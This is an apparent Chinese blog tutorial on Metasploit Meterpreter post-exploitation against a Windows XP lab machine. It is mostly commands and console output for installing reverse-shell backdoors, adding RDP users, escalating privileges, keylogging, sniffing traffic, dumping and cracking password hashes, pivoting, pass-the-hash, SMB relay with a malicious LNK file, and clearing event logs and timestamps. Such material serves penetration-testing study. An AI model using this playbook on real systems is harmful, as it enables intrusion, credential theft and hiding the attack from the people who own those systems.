初探Meterpreter-emaste_r
[-]
- Meterpreter是什么
- Meterpreter常用命令
- Meterpreter与后渗透攻击模块
- 后门
- 1测试是不是虚拟机
- 2安装后门方法一
- 3安装后门方法二
- 4getgui 3389
- 提权
- 1 直接了当getsystem
- 2 MS10-073 键盘布局文件提权漏洞
- 3 MS10-092 Windows 任务计划服务提权漏洞
- 窃取信息
- 1 dumplink 窃取近期系统操作访问文件等记录
- 2 键盘记录
- 3 enum_applications 补丁更新杀软等
- 系统口令窃取
- 1 sniffer 网络嗅探
- 2 IE 缓存
- 3 hash抓取并crack
- 内网渗透
- 1添加路由
- 2 445端口扫描-共享文件共享打印机服务
- 3 psexec攻击445端口-SMB-HASH传递
- 4 MS10-046 MS08-068 自己搭建SMB服务器 坐等鱼儿上钩
- 毁灭证据
- 1 clearev
- 2 timestomp
看这篇文章之前请先看《初探BEEF》文章
===================================================
1.Meterpreter是什么?
- (1)用payload在被攻击者机上开一个端口A
- (2)把命令行终端绑定到A上
- (3)攻击者访问A,就与被攻击者机器交互
- (1)建一个新进程,容易被侦查
- (2)攻击者和被攻击者之间的通信是通过端口互发送数据,容易被IDS侦查
- (3)被攻击者可能chroot(change root directory),限权
- (1)纯内存,所有的需要调用的API都是HOOK
- (2)16字节一组xor加密,SSL通信封装传输
- 总之就是不易被发现,什么平台通用性,可拓展性都是妥妥的。。
2.Meterpreter常用命令
- background # 让meterpreter处于后台模式
- sessions -i index # 与会话进行交互,index表示第一个session
- quit # 退出会话
- shell # 获得控制台权限
- irb # 开启ruby终端
- 文件系统命令:[plain] view plaincopy
- cat c:\\boot.ini # 查看文件内容
- getwd # 查看当前工作目录 work directory
- upload /root/Desktop/netcat.exe c:\\ # 上传文件到目标机上
- download nimeia.txt /root/Desktop/ # 下载文件到本机上
- edit c:\\boot.ini # 编辑文件
- search -d c:\\windows -f *.mdb # search 文件
网络命令:[plain] view plaincopy- ipconfig / ifconfig # 查看网络接口信息
- portfwd add -l 5555 -p 3389 -r 192.168.198.129 # 端口转发,本机监听5555,把目标机3389转到本机5555
- root@bt:~# rdesktop -u Administrator -p 123qwe 127.0.0.1:5555
- route # 获取路由表信息
系统命令:
[plain] view plaincopy- ps # 查看当前活跃进程
- migrate pid # 将Meterpreter会话移植到进程数位pid的进程中
- execute -H -i -f cmd.exe # 创建新进程cmd.exe,-H不可见,-i交互
- getpid # 获取当前进程的pid
- kill pid # 杀死进程
- getuid # 查看权限
- sysinfo # 查看目标机系统信息,如机器名,操作系统等
- shutdown # 关机
写到这,我们给命令们排个龙虎榜吧:
第一名:ps + migrate ,因为我们是通过IE进来的,如果IE关掉了呢?如果它再也不访问那个hook页面了,我们岂不是再也get不了shell了。。所以应该早早移植到别的进程空间,如Explorer.exe,这它不去关掉吧。。第二名:execute ,能cmd.exe第三名:portfwd ,端口转发,现实中基本都是要转发的~看官们,如果你不同意我的看法,可以评论,发表下你的观点哦~~3.Meterpreter与后渗透攻击模块
[plain] view plaincopy- AUX辅助模块 信息搜集
- Exploit模块 渗透攻击
- 后渗透模块 主机控制与拓展攻击的渗透测试全过程支持
Meterpreter 是Metasploit的一个payload,只是比较强大很多而已。它与后渗透模块的关系就是,前者是后者的实施通道。
后攻击模块使用ruby写的,目标机上很可能没有ruby解释器,那怎么玩?4.后门
1)测试是不是虚拟机:
[plain] view plaincopy- meterpreter > run post/windows/gather/checkvm
- [*] Checking if EMASTER-8G5WOLV is a Virtual Machine .....
- [*] This is a VMware Virtual Machine
如果是虚拟机,热情就下降了。。也很可能是蜜罐。。2)安装后门方法一:
[plain] view plaincopy- meterpreter > run persistence -X -i 5 -p 443 -r 192.168.0.108
- [*] Running Persistance Script
- [*] Resource file for cleanup created at /root/.msf4/logs/persistence/EMASTER-8G5WOLV_20131206.5032/EMASTER-8G5WOLV_20131206.5032.rc
- [*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=443
- [*] Persistent agent script is 609628 bytes long
- [+] Persistent Script written to C:\WINDOWS\TEMP\lOFkqsGGtNr.vbs
- [*] Executing script C:\WINDOWS\TEMP\lOFkqsGGtNr.vbs
- [+] Agent executed with PID 1888
- [*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\tTCmdZkXLp
- [+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\tTCmdZkXLp
然后它就在目标机的C:/windows/Temp/下建立一个vbs文件,开机会启动这个文件
上面的vbs的确存在,并且开机启动也有,但是就是有:
这个问题,百度后发现都是说出现这情况是中毒中马,然后教大家删东东,删自启动。。为什么meterpreter出品的东西会在xp下这么容易暴露呢?追查了下,NTVDM是win 16虚拟机的一部分,是win 为了向下兼容16位程序的虚拟机。但是还是提到这么回事?这里留个坑吧,路过的大神,如果看到,可以给我回答吗?3)安装后门方法二:
[plain] view plaincopy- meterpreter > run metsvc
- [*] Creating a meterpreter service on port 31337
- [*] Creating a temporary installation directory C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\JszPreYrwkWEm...
- [*] >> Uploading metsrv.dll...
- [*] >> Uploading metsvc-server.exe...
- [*] >> Uploading metsvc.exe...
- [*] Starting the service...
- * Installing service metsvc
- * Starting service
- Service metsvc successfully installed.
- meterpreter >
监听:31337上传了三个dll文件然后就在目标机器上多了一个自启动的服务:Meterpreter。。。
然后连接:[plain] view plaincopy- msf exploit(handler) > use exploit/multi/handler
- msf exploit(handler) > set payload windows/metsvc_bind_tcp
- payload => windows/metsvc_bind_tcp
- msf exploit(handler) > set RHOST 192.168.0.111
- RHOST => 192.168.0.111
- msf exploit(handler) > set LPORT 31337
- LPORT => 31337
- msf exploit(handler) > exploit
- [*] Started bind handler
- [*] Starting the payload handler...
- [*] Meterpreter session 1 opened (192.168.0.108:39406 -> 192.168.0.111:31337) at 2013-12-06 14:24:29 +0800
- meterpreter >
4)getgui + 3389
[plain] view plaincopy- meterpreter > run getgui -u aa -p 123qwe
如果没出问题的话,应该是添加了用户aa,密码为123qwe,并把它加入到那两个组中。。
然后:[plain] view plaincopy- msf exploit(handler) > rdesktop -u aa -p 123qwe 192.168.0.111:3389
连上~
如果在内网,那么就先端口转发:[plain] view plaincopy- portfwd add -l 5555 -p 3389 -r 192.168.0.111 # 端口转发,本机监听5555,把目标机3389转到本机5555
- root@bt:~# rdesktop -u Administrator -p 123qwe 127.0.0.1:5555
5.提权
1) 直接了当:getsystem
[plain] view plaincopy- meterpreter > getsystem -h
- Usage: getsystem [options]
- Attempt to elevate your privilege to that of local system.
- OPTIONS:
- -h Help Banner.
- -t <opt> The technique to use. (Default to '0').
- 0 : All techniques available
- 1 : Service - Named Pipe Impersonation (In Memory/Admin)
- 2 : Service - Named Pipe Impersonation (Dropper/Admin)
- 3 : Service - Token Duplication (In Memory/Admin)
- 4 : Exploit - KiTrap0D (In Memory/User)
- meterpreter >
getsystem会用四种方法去提权,(In Memory/Admin) 表示所需环境和初始权限。
[plain] view plaincopy- meterpreter > getsystem
- ...got system (via technique 1).
- meterpreter > getuid
- Server username: NT AUTHORITY\SYSTEM
- meterpreter >
system 就是最高权限了。。
[plain] view plaincopy- meterpreter > background
- [*] Backgrounding session 5...
- msf > set session 5
- session => 5
- msf > use post/windows/escalate/ms10_073_kbdlayout
- msf post(ms10_073_kbdlayout) > exploit
- [*] Attempting to elevate PID 0x278
- [*] {"GetLastError"=>0, "return"=>1548}
- [*] Wrote malicious keyboard layout to C:\WINDOWS\TEMP\p0wns.boom ..
- [*] Allocated 0x8000 bytes of memory @ 0x60630000
- [*] Initialized RWX buffer ...
- [*] Current Keyboard Layout: 0x8040804
- [*] Patched in syscall wrapper @ 0x60631000
- [*] Successfully executed syscall wrapper!
- [*] Attempting to cause the ring0 payload to execute...
- [*] SendInput: {"GetLastError"=>5, "return"=>1}
- [*] Post module execution completed
- msf post(ms10_073_kbdlayout) >
3) MS10-092 Windows 任务计划服务提权漏洞
[plain] view plaincopy- msf post(ms10_073_kbdlayout) > back
- msf > set session 5
- session => 5
- msf > use post/windows/escalate/ms10_092_schelevator
- msf post(ms10_092_schelevator) > exploit
- [-] Windows XP (Build 2600, Service Pack 1). is not vulnerable.
- [*] Post module execution completed
- msf post(ms10_092_schelevator) >
哎,我就可耻得只能对XP SP1下手。。这点出息。。
6.窃取信息
1) dumplink 窃取近期系统操作,访问文件等记录
[plain] view plaincopy- meterpreter > run post/windows/gather/dumplinks
- [*] Running module against EMASTER-8G5WOLV
- [*] Running as SYSTEM extracting user list...
- [*] Extracting lnk files for user Administrator at C:\Documents and Settings\Administrator\Recent\...
- [*] Processing: C:\Documents and Settings\Administrator\Recent\1.lnk.
- [*] Processing: C:\Documents and Settings\Administrator\Recent\KaEbvZfANVE.lnk.
- [*] Processing: C:\Documents and Settings\Administrator\Recent\lOFkqsGGtNr.lnk.
- [*] Processing: C:\Documents and Settings\Administrator\Recent\nimeia.lnk.
- [*] Processing: C:\Documents and Settings\Administrator\Recent\pvTdNq.lnk.
- [*] Processing: C:\Documents and Settings\Administrator\Recent\Temp.lnk.
- [*] No Recent Office files found for user Administrator. Nothing to do.
- [*] No Recent directory found for user LocalService. Nothing to do.
- [*] No Recent Office files found for user LocalService. Nothing to do.
- [*] No Recent directory found for user NetworkService. Nothing to do.
- [*] No Recent Office files found for user NetworkService. Nothing to do.
2) 键盘记录
[plain] view plaincopy- meterpreter > keyscan_start
- Starting the keystroke sniffer...
- meterpreter > keyscan_dump
- Dumping captured keystrokes...
- dir <Return> cd <Ctrl> <LCtrl> zhuomian1 <Back> <Back> <Back> <Back> 11 <Back> <Back> zhuo <Return> =-1 <Tab> <Return> <CapsLock> dir <Return> <Back> <Back> <Back> <Back> <Ctrl> <LCtrl> dir <CapsLock> <Back> <Back> r <Back> ir <Return>
- meterpreter > keyscan_dump
- Dumping captured keystrokes...
- <Return> <Return> <N5> <N6> <N4> <N5> <N4> <N5> <N9> <N1> <N3> xugyabq <Back> <Back> ihuanqiiq <Return> http://blog.csdn.net/xihuanqiqi <Ctrl> <LCtrl> s <Back> <Back> <Back> <Back> emaster <Left> -- <Back> <Back> _ <Ctrl> <LCtrl> s
- meterpreter > keyscan_stop
- Stopping the keystroke sniffer...
- meterpreter >
[plain] view plaincopy- meterpreterun > run post/windows/gather/enum_applications
- [*] Enumerating applications installed on EMASTER-8G5WOLV
- Installed Applications
- ======================
- Name Version
- ---- -------
- Adobe Flash Player 11 ActiveX 11.9.900.152
- VMware Tools 8.1.4.11056
- WebFldrs XP 9.50.6513
- Windows Installer 3.1 (KB893803) 3.1
- [*] Results stored in: /root/.msf4/loot/20131206164307_default_192.168.0.111_host.application_476551.txt
- meterpreter >
7.系统口令窃取
1) sniffer 网络嗅探
[plain] view plaincopy- meterpreter > use sniffer
- Loading extension sniffer...success.
- meterpreter > sniffer_interfaces
- 1 - 'VMware Accelerated AMD PCNet Adapter' ( type:0 mtu:1514 usable:true dhcp:false wifi:false )
- meterpreter > sniffer_interfaces 1
- 1 - 'VMware Accelerated AMD PCNet Adapter' ( type:0 mtu:1514 usable:true dhcp:false wifi:false )
- meterpreter > sniffer_start 1
- [*] Capture started on interface 1 (50000 packet buffer)
- meterpreter > sniffer_dump 1 /tmp/xpsp1.cap
- [*] Flushing packet capture buffer for interface 1...
- [*] Flushed 355 packets (101378 bytes)
- [*] Downloaded 100% (101378/101378)...
- [*] Download completed, converting to PCAP...
- [*] PCAP file written to /tmp/xpsp1.cap
- meterpreter > sniffer_stop 1
- [*] Capture stopped on interface 1
- [*] There are 157 packets (40891 bytes) remaining
- [*] Download or release them using 'sniffer_dump' or 'sniffer_release'
- meterpreter >
然后在shell中中输入:wireshark,加载这个/tmp/xpsp1.cap包即可:
2) IE 缓存
[plain] view plaincopy- meterpreter > run post/windows/gather/enum_ie
- [*] IE Version: 6.0.2800.1106
- [-] This module will only extract credentials for >= IE7
- [*] Retrieving history.....
- File: C:\Documents and Settings\LocalService\Local Settings\History\History.IE5\index.dat
- [*] Retrieving cookies.....
- File: C:\Documents and Settings\LocalService\Cookies\index.dat
- [*] Looping through history to find autocomplete data....
- [-] No autocomplete entries found in registry
- [*] Looking in the Credential Store for HTTP Authentication Creds...
- meterpreter >
这里说IE7以上才有效。。
3) hash抓取并crack
[plain] view plaincopy- msf auxiliary(jtr_crack_fast) > cat /opt/metasploit/config/database.yml
- [*] exec: cat /opt/metasploit/config/database.yml
- #
- # These settings are for the database used by the Metasploit Framework
- # unstable tree included in this installer, not the commercial editions.
- #
- development:
- adapter: "postgresql"
- database: "msf3dev"
- username: "msf3"
- password: "4bfedfc2"
- port: 7337
- host: "localhost"
- pool: 256
- timeout: 5
- production:
- adapter: "postgresql"
- database: "msf3dev"
- username: "msf3"
- password: "4bfedfc2"
- port: 7337
- host: "localhost"
- pool: 256
- timeout: 5
- msf auxiliary(jtr_crack_fast) > db_connect msf3:4bfedfc2@127.0.0.1:7337/msf3dev
连接的格式: db_connect 用户名:密码@localhost:端口/数据库名字
这些都放在/opt/metasploit/config/database.yml中如果遇到:gem install pg那么是配置问题:[plain] view plaincopy- vi /opt/metasploit/msf3/msfconsole
- change #!/usr/bin/env ruby to #!/opt/metasploit/ruby/bin/ruby in the top of msfconsole.
具体为什么这么改可参考:解决过程至此,数据库完成,多嘴一句,每次启动msf要手动db_connect。。普通做法一:[plain] view plaincopy- msf exploit(handler) > use post/windows/gather/hashdump
- msf post(hashdump) > set session 1
- session => 1
- msf post(hashdump) > exploit
- [*] Obtaining the boot key...
- [*] Calculating the hboot key using SYSKEY 69f8b1cc8404c6c59864966365d3a7b8...
- [*] Obtaining the user list and keys...
- [*] Decrypting user keys...
- [*] Dumping password hashes...
- Administrator:500:daa141f3639de015aad3b435b51404ee:ad70819c5bc807280974d80f45982011:::
- Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
- HelpAssistant:1000:866b0a48f9bc08d1299a6d3c130ee922:a73c00a673fd19e25e49604cd86288fb:::
- SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:1510034a446ea318032bab987c599881:::
- [*] Post module execution completed
普通做法二:
[plain] view plaincopy- meterpreter > hashdump
- Administrator:500:daa141f3639de015aad3b435b51404ee:ad70819c5bc807280974d80f45982011:::
- Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
- HelpAssistant:1000:866b0a48f9bc08d1299a6d3c130ee922:a73c00a673fd19e25e49604cd86288fb:::
- SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:1510034a446ea318032bab987c599881:::
- meterpreter >
但是这样子,这样的不好之处:
[plain] view plaincopy- 在非sysytem权限下无效。。
- 在win7,vista,win2008不稳定。。
- 在UAC(User Account Control)下失效。。
智能做法:
[plain] view plaincopy- meterpreter > run post/windows/gather/smart_hashdump
- [*] Running module against EMASTER-8G5WOLV
- [*] Hashes will be saved to the database if one is connected.
- [*] Hashes will be saved in loot in JtR password file format to:
- [*] /root/.msf4/loot/20131207144502_default_192.168.0.111_windows.hashes_582943.txt
- [*] Dumping password hashes...
- [*] Running as SYSTEM extracting hashes from registry
- [*] Obtaining the boot key...
- [*] Calculating the hboot key using SYSKEY 69f8b1cc8404c6c59864966365d3a7b8...
- [*] Obtaining the user list and keys...
- [*] Decrypting user keys...
- [*] Dumping password hashes...
- [+] Administrator:500:daa141f3639de015aad3b435b51404ee:ad70819c5bc807280974d80f45982011:::
- [+] HelpAssistant:1000:866b0a48f9bc08d1299a6d3c130ee922:a73c00a673fd19e25e49604cd86288fb:::
- [+] SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:1510034a446ea318032bab987c599881:::
- meterpreter >
智能的流程(当拓展阅读看看):
[plain] view plaincopy- 检查已有权限+系统类型
- 检查是否为域控制器
- 从注册表读hash,若失败,注入LSASS进程;若域控制器,直接注入LSASS进程
- 若win2008+会话管理员权限,尝试使用getsystem,若在system不能注入LSASS,先migrate到system权限下的进程,继续注入LSASS
- 若win7/Vista+UAC关闭+会话管理员权限,尝试getsystem,读取hash
- 若win2003/xp/2000,直接getsystem,读取hash
查看数据库:
[plain] view plaincopy- msf auxiliary(jtr_crack_fast) > creds
- Credentials
- ===========
- host port user pass type active?
- ---- ---- ---- ---- ---- -------
- 192.168.0.111 445 guest aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 smb_hash true
- 192.168.0.111 445 administrator 123qwe password true
- 192.168.0.111 445 guest password true
- 192.168.0.111 445 administrator daa141f3639de015aad3b435b51404ee:ad70819c5bc807280974d80f45982011 smb_hash true
- 192.168.0.111 445 helpassistant 866b0a48f9bc08d1299a6d3c130ee922:a73c00a673fd19e25e49604cd86288fb smb_hash true
- 192.168.0.111 445 support_388945a0 aad3b435b51404eeaad3b435b51404ee:1510034a446ea318032bab987c599881 smb_hash true
- [*] Found 6 credentials.
- msf auxiliary(jtr_crack_fast) >
用John The Ripper来破解:
这是一款开源的,集成多个解密算法的,针对Unix/Linux(当然也可以win)弱口令密码的破解,幸好msf集成这个大杀器。。[plain] view plaincopy- msf post(hashdump) > use auxiliary/analyze/jtr_crack_fast
- msf auxiliary(jtr_crack_fast) > exploit
- [*] Seeded the password database with 6 words...
- /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john: /opt/metasploit/common/lib/libssl.so.0.9.8: no version information available (required by /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john)
- /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john: /opt/metasploit/common/lib/libcrypto.so.0.9.8: no version information available (required by /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john)
- guesses: 1 time: 0:00:00:06 DONE (Sat Dec 7 14:36:28 2013) c/s: 5791K trying: WIT1900 - ZZZ1900
- Warning: passwords printed above might be partial and not be all those cracked
- Use the "--show" option to display all of the cracked passwords reliably
- [*] Output: Loaded 4 password hashes with no different salts (LM DES [128/128 BS SSE2])
- [*] Output: 123QWE (cred_1)
- /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john: /opt/metasploit/common/lib/libssl.so.0.9.8: no version information available (required by /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john)
- /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john: /opt/metasploit/common/lib/libcrypto.so.0.9.8: no version information available (required by /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john)
- Warning: mixed-case charset, but the current hash type is case-insensitive;
- some candidate passwords may be unnecessarily tried more than once.
- guesses: 1 time: 0:00:00:08 DONE (Sat Dec 7 14:36:37 2013) c/s: 18967K trying: ||V} - |||}
- Warning: passwords printed above might be partial and not be all those cracked
- Use the "--show" option to display all of the cracked passwords reliably
- [*] Output: Loaded 4 password hashes with no different salts (LM DES [128/128 BS SSE2])
- [*] Output: Remaining 3 password hashes with no different salts
- [*] Output: (cred_2)
- /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john: /opt/metasploit/common/lib/libssl.so.0.9.8: no version information available (required by /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john)
- /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john: /opt/metasploit/common/lib/libcrypto.so.0.9.8: no version information available (required by /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john)
- guesses: 0 time: 0:00:00:00 DONE (Sat Dec 7 14:36:37 2013) c/s: 1234K trying: 89093 - 89092
- [*] Output: Loaded 4 password hashes with no different salts (LM DES [128/128 BS SSE2])
- [*] Output: Remaining 2 password hashes with no different salts
- /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john: /opt/metasploit/common/lib/libssl.so.0.9.8: no version information available (required by /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john)
- /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john: /opt/metasploit/common/lib/libcrypto.so.0.9.8: no version information available (required by /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john)
- [*] cred_1:123QWE:daa141f3639de015aad3b435b51404ee:ad70819c5bc807280974d80f45982011:::
- [*] cred_2::aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
- [*] cred_4::aad3b435b51404eeaad3b435b51404ee:1510034a446ea318032bab987c599881:::
- [*]
- [*] 3 password hashes cracked, 2 left
- /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john: /opt/metasploit/common/lib/libssl.so.0.9.8: no version information available (required by /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john)
- /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john: /opt/metasploit/common/lib/libcrypto.so.0.9.8: no version information available (required by /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john)
- guesses: 1 time: 0:00:00:20 DONE (Sat Dec 7 14:36:58 2013) c/s: 10089K trying: zydeco1900 - 123qwe1900
- Use the "--show" option to display all of the cracked passwords reliably
- [*] Output: Loaded 4 password hashes with no different salts (NT MD4 [128/128 SSE2 + 32/32])
- [*] Output: 123qwe (cred_1)
- /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john: /opt/metasploit/common/lib/libssl.so.0.9.8: no version information available (required by /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john)
- /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john: /opt/metasploit/common/lib/libcrypto.so.0.9.8: no version information available (required by /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john)
- guesses: 1 time: 0:00:00:09 DONE (Sat Dec 7 14:37:07 2013) c/s: 17311K trying: |||}
- Use the "--show" option to display all of the cracked passwords reliably
- [*] Output: Loaded 4 password hashes with no different salts (NT MD4 [128/128 SSE2 + 32/32])
- [*] Output: Remaining 3 password hashes with no different salts
- [*] Output: (cred_2)
- /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john: /opt/metasploit/common/lib/libssl.so.0.9.8: no version information available (required by /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john)
- /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john: /opt/metasploit/common/lib/libcrypto.so.0.9.8: no version information available (required by /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john)
- guesses: 0 time: 0:00:00:00 DONE (Sat Dec 7 14:37:08 2013) c/s: 1388K trying: 89030 - 89092
- [*] Output: Loaded 4 password hashes with no different salts (NT MD4 [128/128 SSE2 + 32/32])
- [*] Output: Remaining 2 password hashes with no different salts
- /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john: /opt/metasploit/common/lib/libssl.so.0.9.8: no version information available (required by /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john)
- /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john: /opt/metasploit/common/lib/libcrypto.so.0.9.8: no version information available (required by /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john)
- [*] cred_1:123qwe:daa141f3639de015aad3b435b51404ee:ad70819c5bc807280974d80f45982011:::
- [*] cred_2::aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
- [*]
- [*] 2 password hashes cracked, 2 left
- [+] Cracked: administrator:123qwe (192.168.0.111:445)
- [+] Cracked: guest: (192.168.0.111:445)
- [*] Auxiliary module execution completed
- msf auxiliary(jtr_crack_fast) >
可以看到,我在xp设置的弱口令密码:123qwe已经被破解出来了。。但是这个jtr对于强度较高的密码没治。。
8.内网渗透
1)添加路由
[plain] view plaincopy- meterpreter > run get_local_subnets
- Local subnet: 192.168.0.0/255.255.255.0
- meterpreter > background
- [*] Backgrounding session 1...
- msf auxiliary(jtr_crack_fast) > route add 192.168.0.0 255.255.255.0 1
- [*] Route added
- msf auxiliary(jtr_crack_fast) > route print
- Active Routing Table
- ====================
- Subnet Netmask Gateway
- ------ ------- -------
- 192.168.0.0 255.255.255.0 Session 1
- msf auxiliary(jtr_crack_fast) >
这样子msf就成功得在会话1上添加了192.168.0.0/24 这个网段的路由,所有攻击者对这网段的流量都通过会话1转发。
2) 445端口扫描-共享文件/共享打印机服务
[plain] view plaincopy- msf auxiliary(jtr_crack_fast) > set RHOSTS 192.168.0.0/24
- RHOST => 192.168.0.0/24
- msf auxiliary(jtr_crack_fast) > set PORTS 445
- PORTS => 445
- msf auxiliary(jtr_crack_fast) > use auxiliary/scanner/portscan/tcp
- msf auxiliary(tcp) > run
莫名的扫不出结果,run后一直静止。。
3) psexec攻击445端口-SMB-HASH传递
[plain] view plaincopy- msf exploit(psexec) > use exploit/windows/smb/psexec
- msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp
- payload => windows/meterpreter/reverse_tcp
- msf exploit(psexec) > set LHOST 192.168.0.108
- LHOST => 192.168.0.108
- msf exploit(psexec) > set LPORT 443
- LPORT => 443
- msf exploit(psexec) > set RHOST 192.168.0.111
- RHOST => 192.168.0.111
- msf exploit(psexec) > set SMBPass daa141f3639de015aad3b435b51404ee:ad70819c5bc807280974d80f45982011
- SMBPass => daa141f3639de015aad3b435b51404ee:ad70819c5bc807280974d80f45982011
- msf exploit(psexec) > exploit
- [*] Started reverse handler on 192.168.0.108:443
- [*] Connecting to the server...
- [*] Authenticating to 192.168.0.111:445|WORKGROUP as user ''...
- [-] Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: The server responded with error: STATUS_LOGON_FAILURE (Command=115 WordCount=0)
- msf exploit(psexec) >
额,这是个失败的例子,但是如果有人登陆了这台机器,使用了它的SMB服务,而我们设置的SMBPass(这是在其它地方找到的hash)命中,就ok了。。
虽然是靠运气,但是,靠hash传递(而不用crack),也是个好方法。。4) MS10-046 + MS08-068 + 自己搭建SMB服务器 坐等鱼儿上钩
搭建SMB服务器:[plain] view plaincopy- msf post(droplnk) > use exploit/windows/smb/smb_relay
- msf exploit(smb_relay) > show options
- Module options (exploit/windows/smb/smb_relay):
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- SMBHOST no The target SMB server (leave empty for originating system)
- SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
- SRVPORT 445 yes The local port to listen on.
- SSL false no Negotiate SSL for incoming connections
- SSLCert no Path to a custom SSL certificate (default is randomly generated)
- SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
- Exploit target:
- Id Name
- -- ----
- 0 Automatic
- msf exploit(smb_relay) > set SRVHOST 192.168.0.108
- SRVHOST => 192.168.0.108
- msf exploit(smb_relay) > set payload windows/meterpreter/reverse_tcp
- payload => windows/meterpreter/reverse_tcp
- msf exploit(smb_relay) > set LHOST 192.168.0.108
- LHOST => 192.168.0.108
- msf exploit(smb_relay) > exploit
- [*] Exploit running as background job.
- [*] Started reverse handler on 192.168.0.108:4444
- [*] Server started.
- msf exploit(smb_relay) >
MS10-046 LNK快捷方式文件漏洞,貌似能提权[plain] view plaincopy- 存在于shell32.dll当中,windows的程序加载快捷方式的图标。当图标存在于用户的DLL中时,构造恶意的LNK文件指向这个DLL。。
- 系统解析没做好参数验证,导致用户DLL被加载执行。。
[plain] view plaincopy- msf exploit(psexec) > use post/windows/escalate/droplnk
- msf post(droplnk) > show options
- Module options (post/windows/escalate/droplnk):
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- ICONFILENAME icon.png yes File name on LHOST's share
- LHOST yes Host listening for incoming SMB/WebDAV traffic
- LNKFILENAME Words.lnk yes Shortcut's filename
- SESSION yes The session to run this module on.
- SHARENAME share1 yes Share name on LHOST
- msf post(droplnk) > set LHOST 192.168.0.108
- LHOST => 192.168.0.108
- msf post(droplnk) > set session 1
- session => 1
- msf post(droplnk) > exploit
- [*] Creating evil LNK
- [*] Done. Writing to disk - C:\WINDOWS\system32\Words.lnk
- [*] Done. Wait for evil to happen..
- [*] Post module execution completed
- msf post(droplnk) >
过程:[plain] view plaincopy- 我们把这个C:\Windows\system32\Words.lnk文件复制到内网共享文件夹中。。坐等别人点击。。
- 如果有人同事A点击了,这个lnk文件,就触发MS10-046漏洞。。那么A就访问我们搭建的恶意SMB服务器,这也就触发了MS08-068漏洞。。
- 这两个漏洞合作,让人一看就挂。。
拓展阅读:[plain] view plaincopy- NT LAN Manager早期SMB协议在网络上传输明文口令。后来出现 LAN Manager Challenge/Response 验证机制,简称LM,它是如此简单以至很容易就被破解。微软提出了WindowsNT挑战/响应验证机制,称之为NTLM。
- MS08-068是SMB在处理NTLM的一个漏洞。当目标机访问攻击者的恶意SMB服务器时,攻击者延时发送SMB响应,提取目标机上的NTLM的HASH对目标机进行回重放,达到身份认证的目的。。
9.毁灭证据
1) clearev
[plain] view plaincopy- meterpreter > clearev
- [*] Wiping 148 records from Application...
- [*] Wiping 335 records from System...
- [*] Wiping 0 records from Security...
- meterpreter >
2) timestomp
[plain] view plaincopy- meterpreter > ls
- Listing: c:\
- ============
- Mode Size Type Last modified Name
- ---- ---- ---- ------------- ----
- 100666/rw-rw-rw- 0 fil 2013-12-07 16:44:55 +0800 1.txt.txt
- 100666/rw-rw-rw- 68 fil 2013-12-07 12:28:07 +0800 nimeia.txt
- meterpreter > timestomp 1.txt.txt -f nimeia.txt
- [*] Setting MACE attributes on 1.txt.txt from nimeia.txt
- meterpreter > ls
- Listing: c:\
- ============
- Mode Size Type Last modified Name
- ---- ---- ---- ------------- ----
- 100666/rw-rw-rw- 0 fil 2013-12-07 12:28:07 +0800 1.txt.txt
- 100666/rw-rw-rw- 68 fil 2013-12-07 12:28:07 +0800 nimeia.txt
- meterpreter >
这样子,修改了文件的时间,也就不容易被人发觉。。
初探Meterpreter-emaste_r相关推荐
- 2021年大数据Flink(九):Flink原理初探
Flink原理初探 Flink角色分工 在实际生产中,Flink 都是以集群在运行,在运行的过程中包含了两类进程. JobManager: 它扮演的是集群管理者的角色,负责调度任务.协调 checkp ...
- 从壹开始微服务 [ DDD ] 之一 ║ D3模式设计初探 与 我的计划书
